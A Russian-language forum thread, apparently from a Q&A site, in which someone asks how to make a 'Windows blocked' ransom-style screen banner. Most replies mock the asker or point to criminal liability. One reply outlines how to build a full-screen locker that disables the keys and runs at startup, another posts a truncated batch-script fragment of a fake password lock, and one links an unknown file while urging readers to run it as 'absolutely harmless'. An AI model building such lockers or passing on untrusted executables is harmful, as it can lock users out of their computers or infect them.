Екатерина

как создать баннер типа WINDOWS ЗАБЛОКИРОВАН. как создать баннер типа WINDOWS ЗАБЛОКИРОВАН

Elena Orekhova

А чего мучиться -- скачать да и всё....

Ольга Юдина

из этого вопроса и ответ следует - никак тебе.

Марина Полина

чаще ходи на порносайты и лезь куда попало - он сам создастся

Елена Сухарева

Для этого нужен мозг. Но раз вы задаете подобный вопрос, у вас явно проблемы. За создание вредоносных программ есть статья УК РФ.

Валентин

Учись жить честно!

Ма
Мария

спрячь ярлыки, скриншот на рабочий стол

Дима Сашин

Любой язык программирования. Да только, если спрашиваешь, объяснять долго.

Ру
Руслан

написать программку. если делать серьезный блокер, то не скажу. если шутку, то просто пишешь программку в той же Delphi - форма на весь монитор нужного цвета и с текстом и отключаешь действие всех клавиш. Потом помещаешь эту прогу в автозагрузку.

Николай Клягин

Задался целью. найдешь.
Только для ознакомления.
@echo off
XXXX XXXX
XXX
Set Yvaga=На вашем компьютере найден вирус.
Set pass=Пароль
Set pas=Введите пароль.
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
Set dim=Выключаю вирус.. .
title Внимание, это Ты развалил СССР!! !
CHCP 866
IF EXIST C:\windows\boot.bat (
И так далее

Владимир Андрианов

http://files.mail.ru/818EB904612041AE9C5F3D769AE25841 типа этого? абсолютно безобиден, смело запускай.
Sorry за размер.